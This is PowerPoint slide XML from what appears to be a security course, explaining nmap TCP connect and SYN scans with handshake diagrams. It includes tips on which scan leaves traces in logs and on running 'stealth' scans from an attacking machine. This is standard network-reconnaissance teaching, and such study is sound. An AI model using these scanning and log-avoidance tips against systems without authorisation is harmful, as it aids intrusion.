              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reachable, but nmap will not commit to open or closed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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02 / SCANNING</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TCP connect scan   -sT</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15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-s chooses the scan type,  T is for TCP connect: let the operating system open a full connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="5852160" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1944"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="1664208"/>
            <a:ext cx="5394960" cy="320040"/>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Full handshake, every time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2084832"/>
            <a:ext cx="1005840" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="2084832"/>
            <a:ext cx="1005840" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>port 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2395728"/>
            <a:ext cx="0" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2395728"/>
            <a:ext cx="0" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2651760"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="2359152"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3200400"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="2907792"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN / ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3749040"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="3456432"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4297680"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="4005072"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RST  (goodbye)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1572768"/>
            <a:ext cx="4937760" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No root needed. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It asks the operating system to connect, like any normal program.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Loud. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The connection completes, so the service logs it. Your IP ends up in auth.log.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Slower. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Four packets per port instead of three.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Use it when </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you cannot get root on your own attacking machine, or through a proxy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4983480"/>
            <a:ext cx="11091672" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5833"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5193792"/>
            <a:ext cx="10515600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>In practice:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>if you forget sudo, nmap silently downgrades to -sT and your "stealth" scan is anything but. Check the top of the output, it tells you which scan it ran.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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02 / SCANNING</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SYN scan   -sS   the default for a reason</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16</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-s chooses the scan type,  S is for SYN: send the first packet of the handshake and go no further</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="5852160" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1944"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="1664208"/>
            <a:ext cx="5394960" cy="320040"/>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Half open: never finish the handshake</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2084832"/>
            <a:ext cx="1005840" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="2084832"/>
            <a:ext cx="1005840" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>port 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2395728"/>
            <a:ext cx="0" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2395728"/>
            <a:ext cx="0" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2743200"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="2432304"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
